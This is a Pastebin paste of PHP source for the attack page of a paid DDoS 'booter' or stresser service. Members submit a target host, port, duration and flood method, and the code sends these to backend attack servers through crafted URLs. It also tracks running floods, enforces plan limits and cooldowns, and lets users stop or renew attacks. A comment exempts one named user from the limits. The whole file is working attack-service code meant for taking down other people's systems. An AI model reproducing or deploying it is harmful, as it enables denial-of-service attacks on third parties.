Guest User

Untitled

a guest
Feb 19th, 2017
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.33 KB | None | 0 0
  1. <?php
  2. ob_start();
  3. require_once 'includes/db.php';
  4. require_once 'includes/init.php';
  5. error_reporting(0);
  6. //ini_set("display_errors", "on");
  7. if (!($user -> LoggedIn()))
  8. {
  9. header('location: login.php');
  10. die();
  11. }
  12. if (!($user->hasMembership($odb)))
  13. {
  14. header('location: purchase.php');
  15. die();
  16. }
  17. if (!($user -> notBanned($odb)))
  18. {
  19. header('location: login.php');
  20. die();
  21. }
  22. $plansql = $odb -> prepare("SELECT `users`.*,`plans`.`name`, `plans`.`mbt`,`plans`.`max_boots` AS `pboots` FROM `users`, `plans` WHERE `plans`.`ID` = `users`.`membership` AND `users`.`ID` = :id LIMIT 1");
  23. $plansql -> execute(array(":id" => $_SESSION['ID']));
  24. $userInfo = $plansql -> fetch(PDO::FETCH_ASSOC);
  25. $attackResult = null;
  26.  
  27. $currentPage = "booter";
  28. $pageon = "booter";
  29.  
  30.  
  31. if (isset($_POST['attackBtn']))
  32. {
  33. if ($stats->runningBoots($odb) < $maxBootSlots) {
  34. if ( !(isset($_POST['host'], $_POST['port'], $_POST['time'], $_POST['method']) &&
  35. !empty($_POST['host']) &&
  36. !empty($_POST['port']) &&
  37. !empty($_POST['time']) &&
  38. !empty($_POST['method'])
  39. ))
  40. {
  41. $attackResult = '<div class="g_12"><div class="alert alert-danger">ERROR: Please Fill In All Fields</div></div>';
  42. }
  43. else
  44. {
  45. $host = $_POST['host'];
  46. $port = intval($_POST['port']);
  47. $time = intval($_POST['time']);
  48. $method = $_POST['method'];
  49. if (!filter_var($host, FILTER_VALIDATE_IP) && !filter_var($host, FILTER_VALIDATE_URL))
  50. {
  51. $attackResult = '<div class="g_12"><div class="alert alert-danger">Invalid Host</div></div>';
  52. }
  53. else
  54. {
  55. $h = preg_replace("/(https?:\/\/)/is", "", $host);
  56. $h = trim($h);
  57. $h = rtrim($h, "/");
  58. $SQLCheckBlacklist = $odb -> prepare("SELECT COUNT(*) FROM `blacklist` WHERE `IP` = :host");
  59. $SQLCheckBlacklist -> execute(array(':host' => $h));
  60. $countBlacklist = $SQLCheckBlacklist -> fetchColumn(0);
  61. if ($countBlacklist > 0)
  62. {
  63. $attackResult = '<div class="g_12"><div class="alert alert-danger">IP is blacklisted</div></div>';
  64. }
  65. else
  66. {
  67. $bootRunning = $odb->prepare("SELECT * FROM `logs` WHERE `ip`=:host AND `stopped` = 'No' AND `time`+`date` > UNIX_TIMESTAMP(NOW()) ORDER BY `ID` DESC LIMIT 1;");
  68. $bootRunning->execute(array(":host" => $host));
  69. if ($bootRunning->rowCount() == 0) {
  70. $SQLGetTime = $odb -> prepare("
  71. SELECT `plans`.`mbt`,
  72. `plans`.`allowed_methods`,
  73. `plans`.`max_boots` AS `planBoots`,
  74. `users`.`max_boots` AS `userBoots`
  75. FROM `plans`
  76. LEFT JOIN `users`
  77. ON `users`.`membership` = `plans`.`ID`
  78. WHERE `users`.`ID` = :id
  79. ");
  80. $SQLGetTime -> execute(array(':id' => $_SESSION['ID']));
  81.  
  82. $maxBoots = 0;
  83. if ($SQLGetTime->rowCount() != 0) {
  84. $row = $SQLGetTime->fetch(PDO::FETCH_ASSOC);
  85. $maxBoots = $row['planBoots'] + $row['userBoots'];
  86. }
  87.  
  88. $checkRunningSQL = $odb -> prepare("SELECT `user`,`time` FROM `logs` WHERE `user` = :username AND `time` + `date` > UNIX_TIMESTAMP()");
  89. $checkRunningSQL -> execute(array(':username' => $_SESSION['username']));
  90. if ($checkRunningSQL->rowCount() < $maxBoots || $_SESSION['username'] == "Sceptical") // fuck da police!
  91. {
  92. $displayCountdown = false;
  93.  
  94. $fetchLastBoot = $odb->prepare("SELECT `user`,`date` FROM `logs` WHERE `user` = :username ORDER BY `date` DESC LIMIT 1;");
  95. $fetchLastBoot->execute(array(":username"=>$_SESSION['username']));
  96. if ($fetchLastBoot->rowCount() != 0) {
  97. $lastBoot = $fetchLastBoot->fetch(PDO::FETCH_ASSOC);
  98. $bootSeconds = ($maxBootCooldown - (time()-$lastBoot['date']));
  99. if ((time()-$lastBoot['date']) <= $maxBootCooldown) {
  100. $displayCountdown = true;
  101. }
  102. }
  103.  
  104.  
  105. if ($SQLGetTime->rowCount() != 0) {
  106.  
  107. $maxTime = $row['mbt'];
  108.  
  109. // temp shit code
  110. $allowedMethod = false;
  111.  
  112. $methods = $user->fetchAllowedMethods();
  113. if ($methods !== null) {
  114. foreach ($methods as $m) {
  115. if ($m['method'] === $method) {
  116. $allowedMethod = true;
  117. break;
  118. }
  119. }
  120. }
  121.  
  122.  
  123. if ($allowedMethod) {
  124. if (!($time > $maxTime) && $displayCountdown !== true)
  125. {
  126. $servers = array();
  127. $name = "*";
  128.  
  129. if ($useRotations) {
  130. $getServers = $odb->query("SELECT * FROM `servers` WHERE `active`='1' ORDER BY ABS(`last_used`) ASC LIMIT 1;");
  131. if ($getServers->rowCount() != 0) {
  132. $servers = $getServers->fetchAll(PDO::FETCH_ASSOC);
  133. $name = $servers[0]['name'];
  134. }
  135. } else {
  136. $getServers = $odb->query("SELECT * FROM `servers` WHERE `active`='1' ORDER BY ABS(`last_used`) ASC;");
  137. if ($getServers->rowCount() != 0) $servers = $getServers->fetchAll(PDO::FETCH_ASSOC);
  138. }
  139.  
  140. if (!empty($servers)) {
  141.  
  142. $addr = "";
  143.  
  144. foreach ($servers as $k => $server)
  145. {
  146. $addr = str_replace("%host%", $host, $server['addr'] . $server['resource']);
  147. $addr = str_replace("%time%", $time, $addr);
  148. $addr = str_replace("%port%", $port, $addr);
  149. $addr = str_replace("%method%", $method, $addr);
  150.  
  151. @file_get_contents($addr);
  152.  
  153. $addr = null;
  154. $updateServer = $odb->prepare("UPDATE `servers` SET `last_used` = UNIX_TIMESTAMP(NOW()) WHERE `id`=:id");
  155. $updateServer->execute(array(":id" => $server['id']));
  156. }
  157.  
  158.  
  159. $insertLogSQL = $odb -> prepare("INSERT INTO `logs` VALUES(:user, :ip, :port, :time, :method, UNIX_TIMESTAMP(), NULL, :stopped, :server)");
  160. $insertLogSQL -> execute(array(':user' => $_SESSION['username'], ':ip' => $host, ':port' => $port, ':time' => $time, ':method' => $method, ':stopped' => "No", ":server" => $name));
  161.  
  162.  
  163.  
  164. $attackId = $odb->lastInsertId();
  165. $token = md5(uniqid() . "@" . microtime(true) . "AppleJuice:" . $_SESSION['ID']); // overkill, but it'll do ;)
  166.  
  167. $createPingToken = $odb->prepare("INSERT INTO `ping_tokens` (`token`,`user_id`,`attack_id`,`date`) VALUES (:token, :uid, :aid, UNIX_TIMESTAMP(NOW()))");
  168. $createPingToken->execute(array(
  169. ":token" => $token,
  170. ":uid" => $_SESSION['ID'],
  171. ":aid" => $attackId,
  172. ));
  173.  
  174.  
  175. $attackResult = "
  176. <script type='text/javascript'>
  177. jQuery(function (){
  178. $('.countdown2').countdown({
  179. until : " . ($time+$maxBootCooldown) . ",
  180. layout : \" in {mn} {ml} and {sn} {sl}\",
  181. onExpiry : function () {
  182. $(\".countdown2\").html(\"\");
  183. window.setTimeout(function (){
  184. // window.location.href = location.href;
  185. }, 2500);
  186. }
  187. });
  188. });
  189. </script>
  190. <div class=\"g_12\"><div class=\"alert alert-success\">SUCCESS: Attack has been sent to " . $host.":".$port . "for " . $time . " seconds using " . $method . " which will be handled by " . ucfirst($name) . ". You can send another attack<span class=\"countdown2\"></span></div></div>";
  191. } else {
  192. $attackResult = "<div class='alert alert-danger'>There are currently no servers available! Please try again in a few minutes.</div>";
  193. }
  194. }
  195. else
  196. {
  197. $attackResult = "
  198. <script type=\"text/javascript\">
  199. jQuery(function (){
  200. $(\".countdown\").countdown({
  201. until : " . $bootSeconds . ",
  202. layout : \" in {mn} {ml} and {sn} {sl}\",
  203. onExpiry : function () {
  204. $(\".countdown\").html(\"\");
  205. window.setTimeout(function (){
  206. window.location.href = location.href;
  207. }, 2500);
  208. }
  209. });
  210. });
  211. </script>
  212. <div class=\"g_12\"><div class=\"alert alert-danger\">ERROR: Your max boot time is " . $maxTime . ", with a cooldown of " . $maxBootCooldown . " seconds. You can send another attack in <span class=\"countdown\"></span></div></div>";
  213. }
  214. } else
  215. {
  216. $attackResult = "<div class='g_12'><div class='alert alert-danger'>Failed to send attack, you are not authorized to send <strong>" . $method . "</strong> type attacks</div></div>";
  217. }
  218. } else
  219. {
  220. $attackResult = "<div class='g_12'><div class='alert alert-danger'>An unexpected error has occured, your membership</div></div>";
  221. }
  222. }
  223. else
  224. {
  225. $log = $checkRunningSQL->fetch(PDO::FETCH_ASSOC);
  226. $attackResult = "
  227. <script type=\"text/javascript\">
  228. jQuery(function (){
  229. $(\".countdown\").countdown({
  230. until : " . ($log['time']+$maxBootCooldown) . ",
  231. layout : \" {mn} {ml} and {sn} {sl}\",
  232. onExpiry : function () {
  233. $(\".atack-notice\").html(\"The attack has completed.\");
  234. }
  235. });
  236. });
  237. </script>
  238. <div class=\"g_12\"><div class=\"alert alert-danger\">ERROR: You currently have a boot running. <span class='attack-count'>Please wait <span class=\"countdown\"></span> for the attack to finish.</span></div></div>";
  239. }
  240. } else {
  241. $log = $bootRunning->fetch(PDO::FETCH_ASSOC);
  242. $attackResult = "
  243. <script type=\"text/javascript\">
  244. jQuery(function (){
  245. $(\".countdown\").countdown({
  246. until : " . ($log['time']+$maxBootCooldown) . ",
  247. layout : \" {mn} {ml} and {sn} {sl}\",
  248. onExpiry : function () {
  249. $(\".atack-notice\").html(\"The attack has completed.\");
  250. }
  251. });
  252. });
  253. </script>
  254. <div class=\"g_12\"><div class=\"alert alert-danger\">ERROR: An attack to this host: " . $host . " is already present. <span class='attack-count'>Please wait <span class=\"countdown\"></span> for the attack to finish.</span></div></div>";
  255.  
  256. }
  257. }
  258. }
  259. }
  260. } else {
  261. $attackResult = '<div class="g_12"><div class="alert alert-danger">ERROR: Maximum amount of boot slots taken</div></div>';
  262. }
  263. }
  264. ?>
  265. <!DOCTYPE html>
  266. <html lang="en">
  267. <head>
  268. <meta charset="UTF-8">
  269. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  270. <title><?php echo $bootername; ?><?php echo $pageon ?></title>
  271.  
  272. <link rel="icon" sizes="192x192" href="img/touch-icon.png" />
  273. <link rel="apple-touch-icon" href="img/touch-icon-iphone.png" />
  274. <link rel="apple-touch-icon" sizes="76x76" href="img/touch-icon-ipad.png" />
  275. <link rel="apple-touch-icon" sizes="120x120" href="img/touch-icon-iphone-retina.png" />
  276. <link rel="apple-touch-icon" sizes="152x152" href="img/touch-icon-ipad-retina.png" />
  277.  
  278. <link rel="shortcut icon" type="image/x-icon" href="img/favicon.ico" />
  279.  
  280. <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
  281. <link rel="stylesheet" type="text/css" href="css/main.min.css">
  282.  
  283. <script type="text/javascript" src="js/main.js"></script>
  284. </head>
  285. <body>
  286.  
  287. <header class="top-bar">
  288. <?php include "includes/template/header.php"; ?>
  289.  
  290. </header> <!-- /top-bar -->
  291.  
  292.  
  293. <div class="wrapper">
  294.  
  295. <aside class="sidebar">
  296.  
  297. <?php include "includes/template/sidebar.php"; ?>
  298.  
  299. </aside> <!-- /sidebar -->
  300.  
  301. <section class="content">
  302. <header class="main-header">
  303. <div class="main-header__nav">
  304. <h1 class="main-header__title">
  305. <i class="pe-7f-edit"></i>
  306. <span><?php echo $pageon ?></span>
  307. </h1>
  308. <ul class="main-header__breadcrumb">
  309. <li><a href="#" onclick="return false;"><?php include 'includes/name.php'; ?></a></li>
  310. <li><a href="#" onclick="return false;"><?php echo $pageon ?></a></li>
  311.  
  312. </ul>
  313. </div>
  314.  
  315. <div class="main-header__date">
  316. <input type="radio" id="radio_date_1" name="tab-radio" value="today" checked><!--
  317. --><input type="radio" id="radio_date_2" name="tab-radio" value="yesterday"><!--
  318. --><button>
  319. <i class="pe-7f-date"></i>
  320. <span><?php echo date('m-d-Y' ,$userInfo['expire']); ?></span>
  321. </button>
  322. </div>
  323. </header>
  324. <a href="globalstatus.php" class="btn">Global Attacks Status</a>
  325. <!-- /main-header -->
  326. <!-- /row -->
  327. <?php
  328. if (isset($_POST['stopBtn']))
  329. {
  330. $stopbtnID = $_POST['rowID'];
  331. $checkIP = $odb -> prepare("SELECT * FROM `logs` WHERE user=:username AND `time` + `date` > UNIX_TIMESTAMP(NOW()) AND `ID` = :id");
  332. $checkIP -> execute(array(':username'=>$_SESSION['username'], ':id' => $stopbtnID));
  333. $row = $checkIP->fetch(PDO::FETCH_ASSOC);
  334. $host = $row['ip'];
  335. $server = $row['server_used'];
  336. ini_set('default_socket_timeout', 5);
  337.  
  338. if (isset($row['stopped']) && $row['stopped'] == "No") {
  339. $servers = array();
  340. $name = "*";
  341.  
  342. if ($server != "*") {
  343. $getServers = $odb->prepare("SELECT * FROM `servers` WHERE `name`=:name LIMIT 1;");
  344. $getServers->execute(array(":name" => $server));
  345. if ($getServers->rowCount() != 0) {
  346. $servers = $getServers->fetchAll(PDO::FETCH_ASSOC);
  347. $name = $servers[0]['name'];
  348. }
  349. }
  350. if ($server == "*" || empty($servers)) {
  351. $getServers = $odb->query("SELECT * FROM `servers` ORDER BY ABS(`last_used`) ASC;");
  352. if ($getServers->rowCount() != 0) $servers = $getServers->fetchAll(PDO::FETCH_ASSOC);
  353. }
  354.  
  355. $addr = "";
  356.  
  357. foreach ($servers as $k => $server)
  358. {
  359. $addr = str_replace("%host%", $host, $server['addr'] . $server['resource']);
  360. $addr = str_replace("%time%", 1, $addr);
  361. $addr = str_replace("%port%", 1, $addr);
  362. $addr = str_replace("%method%", "stop", $addr);
  363. @file_get_contents($addr);
  364.  
  365. $addr = null;
  366. }
  367. }
  368.  
  369. $updateSQL = $odb -> prepare("UPDATE `logs` SET `stopped` = :stopped , `date` = `date` - `time` WHERE `user` = :username AND `time` + `date` > UNIX_TIMESTAMP() AND `ID` = :id");
  370. $updateSQL -> execute(array(':username' => $_SESSION['username'], ':id' => $stopbtnID, ':stopped' => "Yes"));
  371. echo '<div class="g_12"><div class="alert alert-success"> Attack has been stopped on the server <strong>'.ucfirst($row['server_used']) . '</strong></div></div>';
  372. }
  373.  
  374.  
  375. echo (isset($attackResult) && !empty($attackResult) ? $attackResult : ""); ?>
  376. <div class="row">
  377. <div class="col-md-4">
  378. <form action="" method="POST">
  379. <article class="widget widget__form">
  380. <header class="widget__header">
  381. <div class="widget__title" style="width:100%;">
  382. <i class="pe-7s-menu"></i><h3>Booter</h3>
  383. </div>
  384. </header>
  385.  
  386. <div class="widget__content">
  387. <input name="host" type="text" placeholder="Host"/>
  388. <input name="port" type="text" placeholder="Port"/>
  389. <input name="time" maxlength="4" type="text" placeholder="Time"/>
  390. <select name="method" class="btn btn-block gray dropdown-toggle" style='color:#000;'>
  391. <?php
  392.  
  393. $methods = $user->fetchAllowedMethods();
  394. foreach ($methods as $method) {
  395. echo "<option value=\"" . $method['method'] . "\">" . $method['friendly_name'] . "</option>" . PHP_EOL;
  396. }
  397. ?>
  398.  
  399. </select>
  400.  
  401. <button type="submit" name="attackBtn">Stress</button>
  402. </div>
  403.  
  404.  
  405. </form>
  406. </div>
  407.  
  408. <?php
  409.  
  410. if (isset($token)) {
  411. ?>
  412.  
  413.  
  414. <div class="col-md-8">
  415. <article class="widget">
  416. <header class="widget__header">
  417. <div class="widget__title" style="width:100%;">
  418. <i class="pe-7s-clock"></i><h3>Server Ping</h3>
  419. </div>
  420. </header>
  421. <div class="widget__content filled">
  422. <div class="ping-tool" style="height:275px;overflow:auto;"></div>
  423. <script type="text/javascript">
  424. var timer, i = 0;
  425. jQuery(function() {
  426. timer = setInterval(function() {
  427. ++i;
  428. $.ajax({
  429. url : "pingAttack.php",
  430. type : "GET",
  431. data : "token=<?php echo $token; ?>",
  432. datatype : "json",
  433. timeout : 3000
  434. }).success(function(data) {
  435. console.log(data);
  436. if (data.code === 0 ) $("div.ping-tool").prepend("<div style='color:lime;'>[" +
  437. i + " / 25] " + data.message + "</div>");
  438. if (data.code !== 0 || i > 24) {
  439. $("div.ping-tool").prepend("<div style='color:red;'>[" + i + " / 25] " +
  440. (data.code === 0 ? "Ping completed" : "Ping has stopped, error: " + data.message) +
  441. "</div>");
  442. clearInterval(timer);
  443. }
  444. }).error(function(xhr, txt, err) {
  445. $("div.ping-tool").prepend("<div style='color:red;'>[ERROR] Ping tool has stopped: " +
  446. xhr.responseText + " (" + txt + ")</div>");
  447. clearInterval(timer);
  448. });
  449.  
  450. // Bug fix: sometimes pings don't end
  451. if (i > 24) clearInterval(timer);
  452. }, 2000);
  453. });
  454. </script>
  455. </div>
  456. </article>
  457. </div>
  458.  
  459.  
  460.  
  461. <?php
  462. }
  463.  
  464. ?>
  465.  
  466.  
  467. <div class="col-md-<?php echo (isset($token) ? "12" : "8"); ?>">
  468. <article class="widget">
  469. <header class="widget__header">
  470. <div class="widget__title" style="width:100%;">
  471. <i class="pe-7s-mouse"></i><h3>Attack Manager</h3>
  472. </div>
  473. </header>
  474. <div class="tab-radio-full">
  475. <input type="radio" id="tab_radio_1" name="tab-radio-2" value="tabr1" checked>
  476. <label for="tab_radio_1" class="btn-md">Current Boots</label>
  477. <input type="radio" id="tab_radio_2" name="tab-radio-2" value="tabr2" >
  478. <label for="tab_radio_2" class="btn-md">Previous boots</label>
  479. </div>
  480. <div class="widget__content table-responsive">
  481.  
  482. <table class="table table-striped media-table">
  483. <thead>
  484. <tr>
  485. <th>ID</th>
  486. <th>Target</th>
  487. <th>Port</th>
  488. <th>Time</th>
  489. <th>Method</th>
  490. <th>Action</th>
  491. </tr>
  492. </thead>
  493. <tbody data-tab-radio="tab-radio-2" class="tab-radio-content" id="tabr1">
  494.  
  495.  
  496.  
  497.  
  498. <?php
  499. $SQLSelectRunningAttack = $odb -> prepare("SELECT * FROM `logs` WHERE user= :user AND `time` + `date` > UNIX_TIMESTAMP() AND `stopped` = 'No' ORDER BY `ID` DESC");
  500. $SQLSelectRunningAttack->execute(array(":user" => $_SESSION['username']));
  501. if ($SQLSelectRunningAttack->rowCount() != 0) {
  502. while ($show = $SQLSelectRunningAttack -> fetch(PDO::FETCH_ASSOC))
  503. {
  504. $ip = htmlentities($show['ip']);
  505. $port = htmlentities($show['port']);
  506. $time = htmlentities($show['time']);
  507. $method = htmlentities($show['method']);
  508. $rowID = htmlentities($show['ID']);
  509. echo '<tr class="spacer"></tr><tr><td>'.$rowID.'</td><td>'.$ip.'</td><td>'.$port.'</td><td>'.$time.'</td><td>'.$method.'</td><td><form method="post"><div class="g_10"><button type="submit" name="stopBtn" class="btn red inverse">Stop Flood</button><input type="hidden" name="rowID" value="'.$rowID.'" /></div></form></td></tr>';
  510. } }
  511.  
  512. else {
  513. echo "<tr class=\"spacer\"></tr><tr><td colspan='6'>You have no boots currently running</td></tr>";
  514. }
  515. ?>
  516.  
  517. </tbody>
  518. <tbody data-tab-radio="tab-radio-2" class="tab-radio-content" id="tabr2">
  519. <?php
  520. $SQLSelectRunningAttack = $odb -> prepare("SELECT * FROM `logs` WHERE user= :user AND (`time` + `date` < UNIX_TIMESTAMP() OR `stopped` != 'No') ORDER BY `ID` DESC LIMIT 5;");
  521. $SQLSelectRunningAttack->execute(array(":user" => $_SESSION['username']));
  522. if ($SQLSelectRunningAttack->rowCount() != 0) {
  523. while ($show = $SQLSelectRunningAttack -> fetch(PDO::FETCH_ASSOC))
  524. {
  525. $ip = htmlentities($show['ip']);
  526. $port = htmlentities($show['port']);
  527. $time = htmlentities($show['time']);
  528. $method = htmlentities($show['method']);
  529. $rowID = htmlentities($show['ID']);
  530. echo '<tr class="spacer"></tr><tr><td>'.$rowID.'</td><td>'.$ip.'</td><td>'.$port.'</td><td>'.$time.'</td><td>'.$method.'</td><td><form method="post" action="">
  531. <div class="g_10"><button type="submit" name="attackBtn" class="btn dark inverse">Renew</button>
  532. <input name="host" type="hidden" value="' . $ip . '"/>
  533. <input name="port" type="hidden" value="' . $port . '"/>
  534. <input name="time" type="hidden" value="' . $time . '"/>
  535. <input name="method" type="hidden" value="' . $method . '"/>
  536. </div></form></td></tr>
  537. ';
  538. } }
  539.  
  540. else {
  541. echo "<tr class=\"spacer\"></tr><tr><td colspan='6'>You have no previous boots</td></tr>";
  542. }
  543. ?>
  544.  
  545.  
  546.  
  547. </tbody>
  548. </table>
  549.  
  550.  
  551.  
  552.  
  553.  
  554. </div>
  555. </article><!-- /widget -->
  556. </div>
  557.  
  558. </div>
  559.  
  560. </section> <!-- /content -->
  561.  
  562. </div>
  563.  
  564.  
  565. <script type="text/javascript" src="js/amcharts/amcharts.js"></script>
  566. <script type="text/javascript" src="js/amcharts/serial.js"></script>
  567. <script type="text/javascript" src="js/amcharts/pie.js"></script>
  568. <script type="text/javascript" src="js/chart.js"></script>
  569.  
  570. <script type="text/javascript" src="js/countdown/jquery.plugin.js"></script>
  571. <script type="text/javascript" src="js/countdown/jquery.countdown.js"></script>
  572. </body>
  573. </html>
Add Comment
Please, Sign In to add comment